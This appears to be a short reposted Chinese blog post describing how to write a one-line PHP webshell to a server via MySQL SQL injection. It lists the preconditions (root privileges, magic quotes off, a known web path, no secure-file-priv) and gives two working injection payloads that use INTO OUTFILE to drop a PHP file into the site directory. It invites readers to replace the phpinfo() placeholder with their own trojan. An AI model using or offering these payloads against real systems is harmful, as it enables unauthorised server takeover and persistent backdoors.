MYSQL快速写入一句话拿权限技巧
2020-01-26 18:12:46 Author: mp.weixin.qq.com(查看原文) 阅读量:89 收藏


必须条件:

root权限
GPC关闭(能使用单引号)
有绝对路径(读文件可以不用,写文件必须)
没有配置–secure-file-priv

id=2) union select 1,2,3,4,5,6,7,'<? phpinfo(); ?>’ into outfile ‘/home/wwwroot/lu4n.com/luan_phpinfo.php’#
<? phpinfo(); ?>为写入的内容可添加自己的一句话  /home/wwwroot/lu4n.com/luan_phpinfo.php 为已存在的网站目录下的文件即插入文件名

id=2) into outfile ‘/home/wwwroot/lu4n.com/luan_phpinfo.php’ fields terminated by ‘<? phpinfo(); ?>’#
这句是从网上看的,同样也能执行

测试效果


推荐文章++++

*Certutil 一句话下载 Payload

*一句话木马的各种变形


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&amp;mid=2650459561&amp;idx=3&amp;sn=7e75c7a17ab7e5d5de6272395471ebf7&amp;chksm=83bba84db4cc215b8ffe1572339982d5ddd2ed8b98312173b5dbd98991ff464742b55df042b5#rd
如有侵权请联系:admin#unsafe.sh